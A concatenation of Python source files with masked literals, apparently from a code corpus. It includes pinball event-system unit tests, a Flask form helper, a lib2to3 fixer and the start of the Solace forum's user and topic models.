_handler2_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler2_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler2_kwargs ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:0> ] , self . event_handler2 ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:1> ] , self . event_handler1 ) <EOL> def test_remove_handler_by_handler ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . machine . events . remove_handler ( self . event_handler1 ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . 
assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> def test_remove_handler_by_event ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . machine . events . remove_handler_by_event ( '<STR_LIT>' , <EOL> self . event_handler1 ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:2> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . machine . events . remove_handler_by_event ( '<STR_LIT>' , <EOL> self . event_handler1 ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:2> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:3> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> def test_remove_handler_by_key ( self ) : <EOL> key = self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . 
machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . machine . events . remove_handler_by_key ( key ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> def test_remove_handlers_by_keys ( self ) : <EOL> keys = list ( ) <EOL> keys . append ( self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler1 ) ) <EOL> keys . append ( self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler2 ) ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler2_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler2_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler2_kwargs ) <EOL> self . machine . events . remove_handlers_by_keys ( keys ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . 
advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler2_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler2_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler2_kwargs ) <EOL> def test_does_event_exist ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . assertEquals ( True , <EOL> self . machine . events . does_event_exist ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( False , <EOL> self . machine . events . does_event_exist ( '<STR_LIT>' ) ) <EOL> def test_regular_event_with_false_return ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 , <EOL> priority = <NUM_LIT:100> ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_returns_false , <EOL> priority = <NUM_LIT:200> ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler_returns_false_called ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:0> ] , <EOL> self . event_handler_returns_false ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:1> ] , self . event_handler1 ) <EOL> def test_post_boolean ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 , <EOL> priority = <NUM_LIT:100> ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler2 , <EOL> priority = <NUM_LIT:200> ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_boolean ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . 
_handler1_kwargs ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler2_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler2_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler2_kwargs ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:0> ] , self . event_handler2 ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:1> ] , self . event_handler1 ) <EOL> def test_boolean_event_with_false_return ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 , <EOL> priority = <NUM_LIT:100> ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_returns_false , <EOL> priority = <NUM_LIT:200> ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_boolean ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:0> , self . _handler1_called ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler_returns_false_called ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:0> ] , <EOL> self . event_handler_returns_false ) <EOL> self . assertEquals ( <NUM_LIT:1> , len ( self . _handlers_called ) ) <EOL> def test_relay_event ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_relay1 , <EOL> priority = <NUM_LIT:200> ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_relay ( '<STR_LIT>' , relay_test = <NUM_LIT:1> , <EOL> callback = self . relay_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _relay1_called ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _relay_callback_called ) <EOL> assert '<STR_LIT>' in self . _relay_callback_kwargs <EOL> assert self . _relay_callback_kwargs [ '<STR_LIT>' ] == <NUM_LIT:1> <EOL> def test_relay_event_handler_changes_value ( self ) : <EOL> self . machine . events . 
add_handler ( '<STR_LIT>' , <EOL> self . event_handler_relay1 , <EOL> priority = <NUM_LIT:200> ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_relay2 , <EOL> priority = <NUM_LIT:100> ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_relay ( '<STR_LIT>' , relay_test = <NUM_LIT:1> , <EOL> callback = self . relay_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _relay1_called ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _relay2_called ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _relay_callback_called ) <EOL> assert '<STR_LIT>' in self . _relay_callback_kwargs <EOL> self . assertEquals ( self . _relay_callback_kwargs [ '<STR_LIT>' ] , <NUM_LIT:0> ) <EOL> def test_queue ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_add_queue ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_queue ( '<STR_LIT>' , <EOL> callback = self . queue_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <EOL> self . _handlers_called . count ( self . event_handler_add_queue ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:0> ) <EOL> self . assertEquals ( False , self . _queue . is_empty ( ) ) <EOL> self . event_handler_clear_queue ( ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( True , self . _queue . is_empty ( ) ) <EOL> def test_queue_kill ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_add_queue ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_queue ( '<STR_LIT>' , <EOL> callback = self . queue_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . 
assertEquals ( <EOL> self . _handlers_called . count ( self . event_handler_add_queue ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:0> ) <EOL> self . _queue . kill ( ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:0> ) <EOL> def test_queue_event_with_no_queue ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_queue ( '<STR_LIT>' , <EOL> callback = self . queue_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . event_handler1 ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:1> ) <EOL> def test_queue_event_with_handler_that_returns_false ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_add_queue , <EOL> priority = <NUM_LIT:100> ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_returns_false , <EOL> priority = <NUM_LIT:200> ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_queue ( '<STR_LIT>' , <EOL> callback = self . queue_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <EOL> self . _handlers_called . count ( self . event_handler_returns_false ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( <EOL> self . _handlers_called . count ( self . event_handler_add_queue ) , <NUM_LIT:0> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _queue_callback_kwargs , { '<STR_LIT>' : False } ) <EOL> def test_queue_event_with_quick_queue_clear ( self ) : <EOL> self . machine . events . 
add_handler ( '<STR_LIT>' , <EOL> self . event_handler_add_quick_queue ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_queue ( '<STR_LIT>' , <EOL> callback = self . queue_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <EOL> self . _handlers_called . count ( self . event_handler_add_quick_queue ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( True , self . _queue . is_empty ( ) ) <EOL> def test_queue_event_with_no_registered_handlers ( self ) : <EOL> self . machine . events . post_queue ( '<STR_LIT>' , <EOL> callback = self . queue_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:1> ) <EOL> self . assertIsNone ( self . _queue ) </s>
<s> import pinproc <EOL> proc = pinproc . PinPROC ( pinproc . normalize_machine_type ( '<STR_LIT>' ) ) <EOL> for switch , state in enumerate ( proc . switch_get_states ( ) ) : <EOL> if not switch % <NUM_LIT:16> : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' . format ( switch / <NUM_LIT:16> ) ) <EOL> print ( '<STR_LIT>' . format ( switch , state ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from flask import _request_ctx_stack , redirect , url_for <EOL> import fungiform <EOL> from fungiform import widgets <EOL> from fungiform . exceptions import ValidationError <EOL> from fungiform . forms import * <EOL> __all__ = list ( x for x in fungiform . forms . __all__ if x != '<STR_LIT>' ) <EOL> __all__ += [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> try : <EOL> from flaskext import babel <EOL> except ImportError : <EOL> babel = None <EOL> class Form ( FormBase ) : <EOL> def _get_translations ( self ) : <EOL> ctx = _request_ctx_stack . top <EOL> if ctx is not None and hasattr ( ctx , '<STR_LIT>' ) : <EOL> return babel . get_translations ( ) <EOL> return FormBase . _get_translations ( self ) <EOL> def _lookup_request_info ( self ) : <EOL> ctx = _request_ctx_stack . top <EOL> if ctx is not None : <EOL> return ctx . request <EOL> def _get_wsgi_environ ( self ) : <EOL> if self . request_info is not None : <EOL> return self . request_info . environ <EOL> def _autodiscover_data ( self ) : <EOL> if self . request_info . method in ( '<STR_LIT>' , '<STR_LIT:POST>' ) : <EOL> return self . request_info . form <EOL> return self . request_info . args <EOL> def _redirect_to_url ( self , url ) : <EOL> return redirect ( url ) <EOL> def _resolve_url ( self , args , kwargs ) : <EOL> return url_for ( * args , ** kwargs ) <EOL> def _get_session ( self ) : <EOL> ctx = _request_ctx_stack . top <EOL> if ctx is not None : <EOL> return ctx . session </s>
<s> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> description = '<STR_LIT>' , <EOL> zip_safe = False , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from __future__ import absolute_import <EOL> from lib2to3 . fixes import fix_filter <EOL> import libmodernize <EOL> class FixFilter ( fix_filter . FixFilter ) : <EOL> skip_on = "<STR_LIT>" <EOL> def transform ( self , node , results ) : <EOL> result = super ( FixFilter , self ) . transform ( node , results ) <EOL> if not libmodernize . is_listcomp ( result ) : <EOL> libmodernize . touch_import ( u'<STR_LIT>' , u'<STR_LIT>' , node ) <EOL> return result </s>
<s> from __future__ import absolute_import <EOL> from utils import check_on_input <EOL> INT_LONG_ISINSTANCE = ( """<STR_LIT>""" , """<STR_LIT>""" ) <EOL> LONG_INT_ISINSTANCE = ( """<STR_LIT>""" , """<STR_LIT>""" ) <EOL> def test_int_long_isinstance ( ) : <EOL> check_on_input ( * INT_LONG_ISINSTANCE ) <EOL> def test_long_int_isinstance ( ) : <EOL> check_on_input ( * LONG_INT_ISINSTANCE ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import string <EOL> import hmac <EOL> from math import log <EOL> from random import randrange , choice <EOL> from hashlib import sha1 , md5 <EOL> from itertools import chain <EOL> from datetime import datetime <EOL> from sqlalchemy import select <EOL> from sqlalchemy . orm import relation , backref , synonym , Query , dynamic_loader , synonym , eagerload <EOL> from sqlalchemy . orm . interfaces import AttributeExtension <EOL> from sqlalchemy . ext . associationproxy import association_proxy <EOL> from werkzeug import escape , ImmutableList , ImmutableDict , cached_property <EOL> from babel import Locale <EOL> from solace import settings <EOL> from solace . database import atomic_add , mapper <EOL> from solace . utils . formatting import format_creole <EOL> from solace . utils . remoting import RemoteObject <EOL> from solace . database import session <EOL> from solace . schema import users , topics , posts , votes , comments , post_revisions , tags , topic_tags , user_activities , user_badges , user_messages , openid_user_mapping <EOL> _paragraph_re = re . compile ( r'<STR_LIT>' ) <EOL> _key_chars = unicode ( string . letters + string . digits ) <EOL> def random_key ( length ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' . join ( choice ( _key_chars ) for x in xrange ( length ) ) <EOL> def random_password ( length = <NUM_LIT:8> ) : <EOL> """<STR_LIT>""" <EOL> consonants = '<STR_LIT>' <EOL> vowels = '<STR_LIT>' <EOL> return u'<STR_LIT>' . join ( [ choice ( consonants ) + <EOL> choice ( vowels ) + <EOL> choice ( consonants + vowels ) for _ <EOL> in xrange ( length // <NUM_LIT:3> + <NUM_LIT:1> ) ] ) [ : length ] <EOL> def simple_repr ( f ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> try : <EOL> val = f ( self ) <EOL> if isinstance ( val , unicode ) : <EOL> val = val . encode ( '<STR_LIT:utf-8>' ) <EOL> except Exception : <EOL> val = '<STR_LIT>' <EOL> return '<STR_LIT>' % ( type ( self ) . 
__name__ , val ) <EOL> return __repr__ <EOL> class TextRendererMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> render_text_inline = False <EOL> def _get_text ( self ) : <EOL> return self . _text <EOL> def _set_text ( self , value ) : <EOL> self . _text = value <EOL> self . rendered_text = format_creole ( value , inline = self . render_text_inline ) <EOL> text = property ( _get_text , _set_text ) <EOL> del _get_text , _set_text <EOL> class UserQuery ( Query ) : <EOL> """<STR_LIT>""" <EOL> def by_openid_login ( self , identity_url ) : <EOL> """<STR_LIT>""" <EOL> ss = select ( [ openid_user_mapping . c . user_id ] , <EOL> openid_user_mapping . c . identity_url == identity_url ) <EOL> return self . filter ( User . id . in_ ( ss ) ) <EOL> def active_in ( self , locale ) : <EOL> """<STR_LIT>""" <EOL> ua = user_activities . c <EOL> return self . filter ( User . id . in_ ( select ( [ ua . user_id ] , <EOL> ua . locale == str ( locale ) ) ) ) <EOL> class User ( RemoteObject ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( UserQuery ) <EOL> remote_object_type = '<STR_LIT>' <EOL> public_fields = ( '<STR_LIT:id>' , '<STR_LIT:username>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def __init__ ( self , username , email , password = None , is_admin = False ) : <EOL> self . username = username <EOL> self . email = email <EOL> self . pw_hash = None <EOL> self . upvotes = self . downvotes = self . reputation = self . bronce_badges = self . silver_badges = self . gold_badges = self . platin_badges = <NUM_LIT:0> <EOL> self . real_name = u'<STR_LIT>' <EOL> self . is_admin = is_admin <EOL> self . is_active = True <EOL> self . is_banned = False <EOL> self . last_login = None <EOL> if password is not None : <EOL> self . set_password ( password ) <EOL> session . 
add ( self ) <EOL> badges = association_proxy ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> openid_logins = association_proxy ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def bind_openid_logins ( self , logins ) : <EOL> """<STR_LIT>""" <EOL> currently_attached = set ( self . openid_logins ) <EOL> new_logins = set ( logins ) <EOL> self . openid_logins . difference_update ( <EOL> currently_attached . difference ( new_logins ) ) <EOL> self . openid_logins . update ( <EOL> new_logins . difference ( currently_attached ) ) <EOL> def _get_active ( self ) : <EOL> return self . activation_key is None <EOL> def _set_active ( self , val ) : <EOL> if val : <EOL> self . activation_key = None <EOL> else : <EOL> self . activation_key = random_key ( <NUM_LIT:10> ) <EOL> is_active = property ( _get_active , _set_active ) <EOL> del _get_active , _set_active <EOL> @ property <EOL> def is_moderator ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . is_admin or self . reputation >= settings . REPUTATION_MAP [ '<STR_LIT>' ] <EOL> @ property <EOL> def display_name ( self ) : <EOL> return self . real_name or self . username <EOL> def get_avatar_url ( self , size = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> assert <NUM_LIT:8> < size < <NUM_LIT> , '<STR_LIT>' <EOL> return '<STR_LIT>' % ( <EOL> settings . GRAVATAR_URL . rstrip ( '<STR_LIT:/>' ) , <EOL> md5 ( self . email . lower ( ) ) . hexdigest ( ) , <EOL> settings . GRAVATAR_FALLBACK , <EOL> size <EOL> ) <EOL> avatar_url = property ( get_avatar_url ) <EOL> def get_url_values ( self ) : <EOL> return '<STR_LIT>' , dict ( username = self . username ) <EOL> def upvote ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> obj . _set_vote ( self , <NUM_LIT:1> ) <EOL> def downvote ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> obj . _set_vote ( self , - <NUM_LIT:1> ) <EOL> def unvote ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> obj . _set_vote ( self , <NUM_LIT:0> ) <EOL> def has_upvoted ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return obj . 
_get_vote ( self ) > <NUM_LIT:0> <EOL> def has_downvoted ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return obj . _get_vote ( self ) < <NUM_LIT:0> <EOL> def has_not_voted ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return obj . _get_vote ( self ) == <NUM_LIT:0> <EOL> def pull_votes ( self , posts ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _vote_cache = { } <EOL> to_pull = set ( ) <EOL> for post in posts : <EOL> if post . id not in self . _vote_cache : <EOL> to_pull . add ( post . id ) <EOL> if to_pull : <EOL> votes = _Vote . query . filter ( <EOL> ( _Vote . post_id . in_ ( to_pull ) ) & <EOL> ( _Vote . user == self ) <EOL> ) . all ( ) <EOL> for vote in votes : <EOL> self . _vote_cache [ vote . post_id ] = vote . delta <EOL> to_pull . discard ( vote . post_id ) <EOL> self . _vote_cache . update ( ( x , <NUM_LIT:0> ) for x in to_pull ) <EOL> @ property <EOL> def password_reset_key ( self ) : <EOL> """<STR_LIT>""" <EOL> mac = hmac . new ( settings . SECRET_KEY ) <EOL> mac . update ( str ( self . pw_hash ) ) <EOL> mac . update ( self . email . encode ( '<STR_LIT:utf-8>' ) ) <EOL> if self . real_name : <EOL> mac . update ( self . real_name . encode ( '<STR_LIT:utf-8>' ) ) <EOL> mac . update ( str ( self . last_login ) ) <EOL> return mac . hexdigest ( ) <EOL> def check_password ( self , password ) : <EOL> """<STR_LIT>""" <EOL> if self . pw_hash is None : <EOL> return False <EOL> salt , pwhash = self . pw_hash . split ( '<STR_LIT:$>' , <NUM_LIT:1> ) <EOL> check = sha1 ( '<STR_LIT>' % ( salt , password . encode ( '<STR_LIT:utf-8>' ) ) ) . hexdigest ( ) <EOL> return check == pwhash <EOL> def set_password ( self , password ) : <EOL> """<STR_LIT>""" <EOL> salt = randrange ( <NUM_LIT:1000> , <NUM_LIT> ) <EOL> self . pw_hash = '<STR_LIT>' % ( salt , sha1 ( '<STR_LIT>' % ( <EOL> salt , <EOL> password . encode ( '<STR_LIT:utf-8>' ) <EOL> ) ) . 
hexdigest ( ) ) <EOL> def set_random_password ( self ) : <EOL> """<STR_LIT>""" <EOL> password = random_password ( ) <EOL> self . set_password ( password ) <EOL> return password <EOL> def can_edit ( self , post ) : <EOL> """<STR_LIT>""" <EOL> if self . is_admin : <EOL> return True <EOL> if post . author == self : <EOL> return True <EOL> return self . reputation >= settings . REPUTATION_MAP [ '<STR_LIT>' ] <EOL> def can_accept_as_answer ( self , post ) : <EOL> """<STR_LIT>""" <EOL> if self . is_admin : <EOL> return True <EOL> if post . topic . author == self : <EOL> return True <EOL> if post . author == self : <EOL> return self . reputation >= settings . REPUTATION_MAP [ '<STR_LIT>' ] <EOL> return self . reputation >= settings . REPUTATION_MAP [ '<STR_LIT>' ] <EOL> def can_unaccept_as_answer ( self , post ) : <EOL> """<STR_LIT>""" <EOL> if self . is_admin : <EOL> return True <EOL> if post . topic . author == self : <EOL> return True <EOL> return self . reputation >= settings . REPUTATION_MAP [ '<STR_LIT>' ] <EOL> def touch_activity ( self , locale , points ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _activity_cache = { } <EOL> activity = self . _activity_cache . get ( locale ) <EOL> if activity is None : <EOL> activity = _UserActivity . query . filter_by ( <EOL> user = self , locale = locale ) . first ( ) <EOL> if activity is None : <EOL> activity = _UserActivity ( self , locale ) <EOL> self . _activity_cache [ locale ] = activity <EOL> atomic_add ( activity , '<STR_LIT>' , points ) <EOL> activity . last_activity = datetime . utcnow ( ) <EOL> @ property <EOL> def activities ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _activity_cache = d = { } <EOL> activities = _UserActivity . query . filter_by ( user = self ) . all ( ) <EOL> for activity in activities : <EOL> d [ activity . locale ] = activity <EOL> return ImmutableDict ( self . 
_activity_cache ) <EOL> @ property <EOL> def active_in ( self ) : <EOL> """<STR_LIT>""" <EOL> return ImmutableList ( x [ <NUM_LIT:0> ] for x in sorted ( self . activities . items ( ) , <EOL> key = lambda x : - x [ <NUM_LIT:1> ] . counter ) ) <EOL> def get_badges_with_count ( self ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> for badge in self . badges : <EOL> result [ badge . identifier ] = result . get ( badge . identifier , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> return result <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return repr ( self . username ) <EOL> class UserMessage ( object ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> def __init__ ( self , user , text , type = '<STR_LIT:info>' ) : <EOL> assert type in ( '<STR_LIT:info>' , '<STR_LIT:error>' ) , '<STR_LIT>' <EOL> self . user = user <EOL> self . text = text <EOL> self . type = type <EOL> session . add ( self ) <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . id , self . user . username ) <EOL> class TopicQuery ( Query ) : <EOL> """<STR_LIT>""" <EOL> def language ( self , locale ) : <EOL> """<STR_LIT>""" <EOL> return self . filter_by ( locale = Locale . parse ( locale ) ) <EOL> def unanswered ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . filter_by ( answer = None ) <EOL> def eagerposts ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . options ( eagerload ( '<STR_LIT>' ) , <EOL> eagerload ( '<STR_LIT>' ) , <EOL> eagerload ( '<STR_LIT>' ) ) <EOL> class Topic ( RemoteObject ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( TopicQuery ) <EOL> remote_object_type = '<STR_LIT>' <EOL> public_fields = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:title>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:date>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , locale , title , text , user , date = None ) : <EOL> self . locale = Locale . 
